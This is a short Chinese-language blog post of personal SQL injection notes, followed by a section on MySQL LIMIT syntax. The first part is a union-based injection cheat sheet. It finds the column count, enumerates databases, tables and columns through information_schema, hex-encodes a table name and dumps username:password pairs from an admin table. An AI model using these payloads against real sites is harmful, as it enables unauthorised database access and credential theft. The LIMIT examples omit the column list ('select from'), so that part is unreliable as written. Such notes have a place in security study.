sql

0x01 sql基础语句

爆字段长度

Order by num

匹配字段/爆字段位置

and 1=1 union select 1,2,3,4,5……

爆所有数据名

select group_concat(SCHEMA_NAME) from information_schema.schemata

爆当前库的所有表

select group_concat(table_name) from information_schema.tables where table_schema=database()

爆表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572

select group_concat(column_name) from information_schema.columns where table_name=0x61646D696E75736572

爆字段具体的值

select group_concat(username,0x3a,password) from adminuser

0x02 sql的limit使用方法

1、下面是几种limit的方法:原则看看下面几个例子应该就懂了

在数据库中很多地方都会用到,比如当你数据库查询记录有几万、几十万时使用limit查询效率非常快,只需要查询出你需要的数据就可以了·再也不用全表查询导致查询数据库崩溃的情况。

select from Customer LIMIT 10;–检索前10行数据,显示1-10条数据
select from Customer LIMIT 1,10;–检索从第2行开始,累加10条id记录,共显示id为2….11
select from Customer limit 5,10;–检索从第6行开始向前加10条数据,共显示id为6,7….15
select from Customer limit 6,10;–检索从第7行开始向前加10条记录,显示id为7,8…16

本文标题:sql

文章作者:Mr1.Grim

发布时间:2018年07月06日 - 13时24分

最后更新:2018年07月06日 - 18时43分

原始链接:http://yoursite.com/2018/07/06/sql/

许可协议: "署名-非商用-相同方式共享 3.0" 转载请保留原文链接及作者。

文章目录
  1. 1. 0x01 sql基础语句
    1. 1.1. 爆字段长度
    2. 1.2. 匹配字段/爆字段位置
    3. 1.3. 爆所有数据名
    4. 1.4. 爆当前库的所有表
    5. 1.5. 爆表中的字段名 将敏感的表进行16进制编码adminuser=0x61646D696E75736572
    6. 1.6. 爆字段具体的值
  2. 2. 0x02 sql的limit使用方法
,